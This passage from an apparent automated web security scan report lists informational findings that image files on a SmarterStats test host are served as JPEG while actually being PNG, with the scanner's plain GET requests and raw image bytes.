.M.p.M....@.c.V..J....u..#.7./l......I..n.hr.I....mZ..O..c....M.........5=@........Yk.T..+.8....:z.s^.B.......F.....)U....6......|.L.|,.J0WI..`......6....l........}......TYK......),.:+G&...c5`............-=f....J.......).I...>..){..K..-S........    .mQw....Ug.....b...c...0_qa;_.lO&...p..V.a.L...Z.G.M.......rd..A1V..1^.l.....[|Lv....$.F.a...}.d
}...:a...............2P...X.T.....:(X.a....T.}b)..a....Ug.....b...c...0G..}$..!l._'l.B..%..&........QY29.Y0...<....s...Hj.....*l.B..'.    [.@....3l:)O&.2..H..Ghyra..y:I..C.~..Z....#U....&6yMca.Y92......../G6..6G..5...g.>..*ly.a...a.QY29.Y0...<....s...Hj.....u..).    [.Yk....]..M'...@.......-O...6O'.U...{..%
Y..}\)..a...S.:(S&.2..@...`.Ra...ZI+.C.~..Z.....U......x.ba.Y92......../G6..6G..5z.....e
]..S.-O lr.#l:*K&.2..P...pY.a..Y.I-.E......D....rv.XX..w...7S..y.....}...........)da...KI.L...+...rd..A1V..1^.l.3as..\.a....T.~T..<...m.)Q..%....c...C.,.0G.,....!l/...L.O...Z.G.M.r.:.Iy29.y8F..<B...s...Ib.....*l.B...=..D...M^.XXuV.Lx;(.j.<...s...Gr.....*k.B..GTa...............1T..!\.d.#l.FR.......e
.M......:.............@..e.E..Y.-Q....:a..L...
.3..#......0..rd..as..\...]Ve-S lr...D..aw......mx.0?`.}...?.-p[..>..D..M. .:+G&...c5`.....9.6G..5....=.
[.@..6..=:*K&.2..P...pY.a..Y.I-.C.^....L!..M$kM..6...@.N......1R...Z.\.#l.N.. l_.........<...M^.XXuV.Lx;(.j.<...s...Gr.....:a....-..5qD..6G.tT.L.d..."0...$..a.4.Z.....
[.......%Q lj.3a.Iy29.y8F..<B........2.o..9}..1*..Al.&nO....'...=..Em.C..We-S l.......u.}..ay.W.9..'....U6.26O.....!..Q................g.>pq...    &lB...p0.Y92......../G6.W^..&kM..    [..xR..g{.6...j..m.v..JC....^...).    .....    .M..Y......    o..X..x9.a.....&.......).]y;.fek.....y..n........hM7T49zN..L..i..?...WYK.m..m7?...akz..8.=........k.M....&b..o..l'M.".6o....e...-........'...k..%..rd..A1V..1^.l.3a;...L..&kg.....$e
...t....:......9.?<o..0_.    ......B.'.&.....E.mB.{a.....=/.p.    ......)ta{@...    &lB... .:+G&...c5`.......N..."=r[.}yk.v.o...*l.B...]TJ.@..%..Ug.....b...c...0_.a;.].'...es4.I5zL.2.Z...mY.................a.V.D.7X=.9.w...5c.a{.[.R2..l....<..M_ .:+G&...c5`.....y.    .....[i.}...3..}..F.a{F..L!..{..%
.M........vP...y..#.........}....s.@...D.{.*ly.a..C,.:+G&...c5`.....y
a.}...I..+4..:G...vi..e
}..G..8"l.{..Ug.....b...c...0..l.....m..F...)...x..K.R.-Q.......(.6..YXuV.Lx;(.j.<.........g.F.    ....e
]..S.-O l....Ug.....b...c...0..l..2.|_....}j l...%..&.....aa.Y92......../G6..    [..C_.~....r......!l.7.T2.>a.w...    .M........vP...y..#....mo...$m^s"l7.7.}w..D...K......    o..X..x9.a.].......!lO...L!O..}.*ly.a..g,.:+G&...c5`.....y7a........v...@."..{Va.....Nda.Y92......../G6..    .c....=...o..d
y...*k..a..o,.:+G&...c5`.....9...#.........U....&.yaa.Y92......../G6..    .p...S..m.6..4]k..O...Z.G.M.F.V..#......0..rd......}..V.6........7.T2..lw...<...K......    o..X..x9.a..9.H....&l..[)..a...S.:*K&.2..P...pY.a..Y.I-.C..R'l.B..%..&......a.QY29.Y0...<....s...Hj..-2a.k...    .M.r.M'...@.......-O...6O'.Uz.......).    .;.RJ.@..&.i,.:+G&...c5`.....y7a.*QG./...(...mA......s..a.!....^.0..@7a....}....'UI......N....6....Lg.....b...c...0G..}$.."lo...(ta.S..<...m..AGe..@f..*....K2..6K#.Ez.....e
Y..^e-Q lj.s.H'...@.......-O...6O'.U...g..~.*ly.a...........vP...y..#..k#l.e2..UW..q..F..O..{+.....!lO...L.O..P.-O l.....,.:+G&...c5`......Z.....s.m{R...[..n\...}^....vU..D..    .r.SXX......w{5..|x.+/l{..&m'.[......G.Wv^.a{|..L!..5./%Q0aS:|...Lg.....b...c...0_ya.k.].J."...s.m....rss.49;)Z..M..W.-S.mZ..O.(...mi..h...p.kX....Y..........G.U.+l.h...=../.L.O.nW.-O0a....KXg.....b...c...0g..>.9.T...=...U.2..l.U.-O lJ.sJT....@.c.V..J...s.....m.w.E...B_"l_...*..5qD....Maa.Y92......../G6..V..."...c^....!l....L!O.....$
.mQw....Ug.....b...c...0_.a;.].'.....@....../.L.............=,..j0.....V...>&C.Z.^5:...Q&Yk....o.    [.`..w..3..#......0..rd.|m...>..=..QU.2........,...1x...    ...a~.|n......j.a{}..D!..[..D..M.!.:+G&...c5`.....9.6G..5z..#..e
].n[.-O lr......%....c...C.,.0G.,...A...aK$kM..6...@.N......1R...Z.\.#l.N.....G..K%S..._...<...M^.XXuV.Lx;(.j.<...s...Gr..K.U.o...(.6...6..%....c...C.,.0G.,...A."...U.....v9.6..'....c.
.#.<.0G.<.$V.!l...D3.|J.-....'.6..9%..2er 3....y..).......2]...*l.B..7WYK.....-..Ug.....b...c...0G..}$..!l....)ta..*ly.a...a.QY29.Y0...<....s...Hj..-...D....aS..    .N......1R...Z.\.#l.N........K%S...[.    [.@..&.i,.:+G&...c5`.....9...#.........KI..............1T..!\.d.#l.FR......    [..'l.d..#..v9.6..'....c.
.#.<.0G.<.$VA.".._...<...M.)Q..)...    d.....L.0G.L....!l.~..%S...7...D..i=..XXuV.Lx;(.j.<...s...Gr..F.....Z.G.Mns.MGe..@f..*....K2..6K#.Ez...u..).    ./.    [.@...g....dr .p.T.y..'.......*]...U....l.P.-O lb.sJT.e..@f..(...,S*..6S+iez.....e
Y.....(.6..[......    o..X..x9.a..9.H....>.v..U....&.9....dr .`...y..%......."=...u..).    ..Wa......L.tR.L.d...*0......a.t.X....G..D!.....%
.MlrN...L...L .e`..eJ.9.6%..1*..All..lO....'..m7..E}.C..Pe-S...sU........~....rd..A1V..1^.l.#lM..d<..|l...x.Qf.v(g{r..BG......e
.Mh.3...:.............@..|.l.'U..>....T..{....."l...rQ......-%Q0aS:|...Lg.....b...c...0G..y.:1;tJtW...Y=oZF.\....7...firvR...*.....Z.h.......U?.*.6-.n~>\o.....=p.z`gg....5..q..M..O}.>.v.$-"l.h...e...-..-.....$..._.!\.N.......<.....s&l.6..I..d....._..L...O.    [.............vP...y..#.....J...B....&l.S.{......v/L.....=&l...*l.B..+..%
.Mh....V..#......0..rd..a..8r[.}y[..z...Z........    .M_rYXuV.Lx;(.j.<...s...Gr.....Ta.....d..<...m.U.:*K&.2..P...pY.a..Y.I-.E.^U.-Q lj...<..a......^.0....6(...v.*k.B....(%Q0a..*..tV.Lx;(.j.<...s...Gr.-p[.D....a............1T..!\.d.#l.FR. l.a..:a.........Iy29.y8F..<B...s...Ib...v...d
..h.Yk....M^.XXuV.Lx;(.j.<...s...Gr......6~.N....&.9....dr .`...y..%......."=...u..).    ....D...]..M'...@.......-O...6O'.U....TaK....,g8..u....ay.W.9..'.........Z.....u..'...o..f:+G&...c5`.....9...#......["Yk....m..AGe..@f..*....K2..6K#.Ez.......).    ...    [.@....t.N......1R...Z.\.#l.N......Ua.......KI.....5..Ug.....b...c...0G..}$.@...D..Z.G.Mns.MGe..@f..*....K2..6K#.Ez..]..-S.......<...]..M'...@.......-O...6O'.U...+./wM...]...$
.MlrN...L...L .e`..eJ.9.fj%.L.a.K..L..i.r..XX..{...w{5..|x................-O0a..*..tV.Lx;(.j.<...s...Gr...v...d
y...[..(.6...>..,...,.CE`..eI.9.fi$.H.a.S..L....Wa.........Iy29.y8F..<B...s...Ib..-pJ4..5qD..&.i,.:+G&...c5`.....9...#.F.a.c..e
}..}u..'.6...6..%....c...C.,.0G.,...."l.X.-Q....*k..aS..    .N......1R...Z.\.#l.N.....;TY....}o..<...M.)Q..)...    d.....L.0G.L...A...a{..Ta....=..n]2....,.V.G.
.UR.<..X..`....r$o{2...h....\......_(.B.....Z.....o|i..M .|...I.S......=><u.#l......h.lMs.L...:..........*ly""lW\Y......6.).#..]...@6.>.9..'.............`.a.]..e
}..G..8F..U...L.
../..d.&....+oQ...m.-?_2.....+...c.v.._x..)c...../*.c.v_z..K.X..Y~A...]....F.m..m...[d..]u..'".......)Ta..%..L.
...xQ..M".=......T..i....3...T..Iy4a..s....M..M.^>.t.h....d.sY.h.uV..[`.)....Y....k...\u.U....z......5..k..6`..S.....3..)......CO5W.d...y..!......0..3..|..a.4.......H......l...5....b.....N...S............s..f.......z1~    ..... ...0a.. ...@....@~.......B.@.................@....@~..[.}..B...... .....5o.....W....5.}...b..hzQ.x3...n.^...{..G.I..<..&p..3z|...:..5.....?n............6,..W....{.).*...r........./.y..2......|Y..-..p...S|.....G]&l=.....h.+.6..].........|.:];...+.......6.......4Qk.v l..i.r..OU...w^u..G..!^p}_cA|....:._.XoLv..m..)...U{o...^%v....[Y.u.a;EK...    ...'..U...b......qz.....S.L....N.-7K...-....c...m......Aw...c.}....,m..?=......>.........g.)Q.m.].+.&.....L....X.3a[>..E.....}...[../qT..?..L.V....Oj.....L.=|8x.~@...}...L3.a~x...e#?&l..........>. ...@...85.&l.FH..@...... .\...r.R...... .......vj..... ...@...%..-./.!...@......     l.FH..@...... .\...r.R...... .......vj..... ...@...%..-./.!...@......     l.FH..@...... .\...r.R...... .......vj..... ...@...%..-./.!...@......     l.FH..@...... .\.....Q.n.o.....IEND.B`.

10.28. http://vulnerable.smarterstats.6.0.host:9999/Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.29. http://vulnerable.smarterstats.6.0.host:9999/Temp/78969dd70ff94762832f8dc8e7f76105.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/78969dd70ff94762832f8dc8e7f76105.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/78969dd70ff94762832f8dc8e7f76105.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:16:24 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB69812D2FDC00"
Content-Type: image/jpeg
Content-Length: 6302
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...3IDATx^..Y.,E..q....Q.D.\PA..Q...qp.].}....#......4.J.......O7..i.]=U5u..,..U....qi..T....OfV.:...
@.(0..g.......... B.@.(0.......'....@....P`t..../.N.
@...1.....
.D._........b.
@.....F..8.(..........K..85xU.mB......b.X.s\r(...S`|.......K.9.....8...O-....KLj..>.O.....^..A.....`o.D.......YO;.j....W.
@.:...D.Tjpj.3...[.A...Bv..l...K..+..._|1.K/..N.>......x..W....D...?5.X'
.YM...Mj..Q[.....v..J.*.'.....?...a.k....w)_.?..h....DS*...tj..q...V.tRoZ_.B..?.Z.N...O...|I..T..@..S..x.....Xs.P.8..,J......s....R.tRoZ_    D05.....\..A....._A).......l..DR4..K....o...M ....`<.X,..9..o...5k.....Y.+B...D.....D~..X....VA[.H ...-.8.....~gj...A.    Q][.H......Z_    D.55.. .......\J-.8..."4..Adh..@..a..L...i..9-.......@..qb. 2Sk. ......D......L..6K.x..J.....w.D..'.....5...._9gh..@d6......f)..Z_../....".........zFt.....D....BF$.R..p<k}....B...".........zF...#;..f................f)..Z_..........(.f5.65.f5@....3...Adg..\@...p.jnmjn.j.. ..     ...........Y... .!.=.S.. ...RwR..~..m..]<?.(.?...A..s..Z.N.......UQ..}....K<1_...Y.....dN.j}m.D.>..j...]..... ..Y..M....7^...$.r..z.F..{..05...,.f5..y... J.    ...J ....D3..5.P....vk....\..@.{E.v......S3Z6.....$.$.J.1...7;gh..v #....1.........~.Adg..@$.=.#."....nR1%.r.D.'...gVy;.H~.$A'.......M......4...........Y.+..G....D..^.. .K.......@t.#....:aj.....17...g~...!#BF$.=X.6.N..'u.......L .....5"3.&.}...^.....``j...*0%A'u...2....2"dD.xFFd...3..ot..."..l8a.Z..6K.x....0.P...h6 J........5..<........}*(.."...m.p.x..J ....D3.Q..Q.#...........[T..z.........:gh..L@........./|!.^kf.Fj..D....<... .#.B.3..T..h...l..e...C....q.H.+B..B....J@..V-04k=..Nv.u.Y.......|^...zQXK......](?@.o..O^oj(.?.G..~.Py.Q.=d......r..0y.q.w.......k.....Zh}%.}....U.....L...u..o........kT.|../......At.....DU...}.........M.....[...A...5...5...V.. J.    ........M ..D.@...(./WO;hs=.....^..].k%.c.F.w..+.9..x~.JT.I0H...c..o.........-.ci.4tC.$.......ZO.DO\....D5..s..#.G...0/s$@$.. .M*.._n.H..Sqyf...u...v.t;.H..$.....b...7M.Q..Q......4\...D|..#.p.x..J .....*@.<......='.J....jk........X..4U..Q.i.R.A..kJ}. z.jSCFTSF.{(..).....!#.+....Y.._n.H..S1...kDCO...u...".E......W...25dD5eD....8.H~!.p.x..J ....D...U.5fF.'.9a6^[.H......Z_...y...@T....VO.7S...6...@..A......Z_    DW..@T..ZO.w.+v.._.ly...O.S.... ..`. ......DU.h8#..&...Y...E......D;..G=.. ..D.$..M|.U<-......H....@.K ......D..H....$..skSS...P.zGkV?z.....fu.5..!D..........:j..9...b......!#.5#j...74._...7...u.15....V;hs=..c.......@4*.r.4.]F.|v.|.....B/..rS..f.........z.I.L......a."C..F.Q3%.nYX........ J....e.Dv...
..yk....>...1.5.!."4.....DU..u...h.Ej.H3<..fr1'..=.Adh.Qm Z.O3m.....]...=... ..D..P#!@.K ......DU...x.t2..t..........D......|x....xz..;g.kv.R.";..F..<pk<. ._..-V.......D..|......RN.D.~.9C..."........t....~.A#..N..3...2"........W.^....!#.&#B......H.~,.vs}M.O...|....*@......$.J...... .3..
.Y..o:..F...J.y...T..805..... ..nLI..(..I...^u.uB....s.....e..S.j....G40jb.r........(...x~.    .{.........).##....    :.7./m.W..gM ..    eF$.....(f8.. .-...e.....;Z<...<......(...fu.....5 .%F..+......Dm(!#...h...g.....A(|.2.J2..
..Y.4...i..a....jL..a.....(..b'0B..gL ..D.<.o....h.u..._ _eJ..e.Z...b5.X}...Dv..U...}D..Y.../L...........VYZl...Y*S)...#..P..@T...I.{.G.EZ?...F...    .M0H.M.D......"...h...!.....9.. J..... ......D.a.;..f<...'...>....D....F...'....H-..VG.Dr%....<... ..D.....z8....<.K.    .....t..S./7J$}.........w..... .k/    :.7.....{..!#."#j?.J=t*.r..Dr..p.x..J :....*@..a.9.eV.z.kz.c*...Ji..........-n+.N....\.:. ._.I.I.i}E...ISCFTKF$........C...g....sM ..D....;.9......\U-.8......M..3f+.t.2..V.m.".u....Y.+....05dD.fD..T.R..(.O..7Ar.n.....@..P..Z8p<k}%.}.....@.y.uC.j..5.s".."...m.p.x....f75.... .\..[..jO.=@....At.9...2..3.V.v=......./.../.......Vnl>.......f).3......c....
"N...-."......w..Adg(._E..\.....Q3..N....\.^.m..........25dD;..u_..Q..5.Q.z.p.....9.c.m.....}....6{..V..E...>jj..f.....jV...&.$.....x...@d.{.?.....04...D)?f...g:gh...A....cq..O.vk.H.[>%.r.D.'...gVy;.H~.$A'......;?lj....I...q..\J-.8..."4..!S..."N..m........Y.. ..='.......k......@.ASCF..........~................D.........0...".....\Jm......2....@..qb....Z.....>.. .....2"...,..Y.+B..B...".........zF.^.#;..v.D.......D.O...GdDrJi...g........@.S "......8...\@....G.. ...qM........C.?Th.e.....V......3";CF.K.Q...{K(.A...GAQ
......].Dv.......9...
....[=4 B...-.o...4...].....oG.6hSQ}........N.#......2......X.M._M.2"vQ}b..D..    .l.&G..b.!.......Q.jg.~..."...K../a.>.....0....:K.{.F............W..Th.W. "@..-.....6....6v.."........-nr.........fjc..3.$.
.....?.....Z.`O.hjc.Z..74J.Z..dDDF..u..Z. z....l.>q..$S.|?2".Z.c.".DO\....=h.........'..".Z#.....=v.s.6..M z....'.p..8j... "@........6..M.6v.8.. ..5B[.....K.3...m...."C...6n.m.S3<.".z......=p.s.V....Adg....7;k+    =............O\......7x...    ..np..H_..z.....N..@D.....3............~...9c#}..b.n...4.....L....0$]....15r ..8.n..A.z.";#.<|._..5....f.%...0....Q)@..y.zS...~~...Fg.W....h......H?.\...l..e...6'."Mz..|.>^.'.552....9C[.../#.....5....<....N......F.2\..k..........[dD....../r....h..... ....s#.....DvF...,....U`
....5[.E....4..=.:ght....m.l-....
.w.}2...)%..x.......i.{.H_.2W........l...5.O.8......4@....C.=.........o+#.U].y..    .J.*..d.J...~.>......7._~.e....-.'.`)_....SI_s.O..Y..,./F....P`.
..D^1...6..wC.(.Y...hs...
@.Z...j..8.(..
.D;|..u(P...Q-W....vX.....w.H..@.z)..O..`._...+......9..c.x...5@.Y...1.:.....Qx6.    .R.J.YA...x.8&....!@..kmS*p.....=..h.>..b....'T.W)?.......K^....6....Q..`..a!+:p.....}.X..B.......W.W)?)..~..i.1a5^z....    K?F...5.. *.......'(...~9!ZR.........Q.sRc#...T..,|..O..@.g52... ..).......,>...s..(.d6-...*..d.J...~y#"..@..UV..V..z...c....Q.x..&6*.....}*.k...G.....f...
@.-+..mY`|=.......6k..P.
lY..h..........@.Y#Q..0......@...\..u'.4................?.?T......8I..w.77....W......c. ...1.....w..U..1...9..W..{..j.f.+.}...S...z&/=...S.....C....[..w...yZ ..U.....5....v..DvZ...~...).u.H.....W....Cw...YQjJ..s...)_.w.m.r..tam.'.u......7...[.D[P.|.Q..[>..z.Uw..........t..6..IpS&....V..d.....h.YB..[."..;..&..N....e..S".....l.jmp..r..b.......GM..    D.^...y=... .|...~...y.-..r....!.."n.e..N..'.3.,..N-.....d3M.@......g....m..Y.$.. #..aSn.Y.<z.+...VW.b.&K.......3....3......,.8\(.:.3.54-...;.>. 2.q._Bm.v...[>I!r...}o.k.....O......n.....ke.kh}f{.......s..P...X#*,8.A.(p\...Q.....
.D._........b.
@.....F..8.(..."......+...~    p.P.
.D..(..FW. ............P.
...@4.%.    @.(..!.....]....I..... ....IEND.B`.

10.30. http://vulnerable.smarterstats.6.0.host:9999/Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg

Issue detail

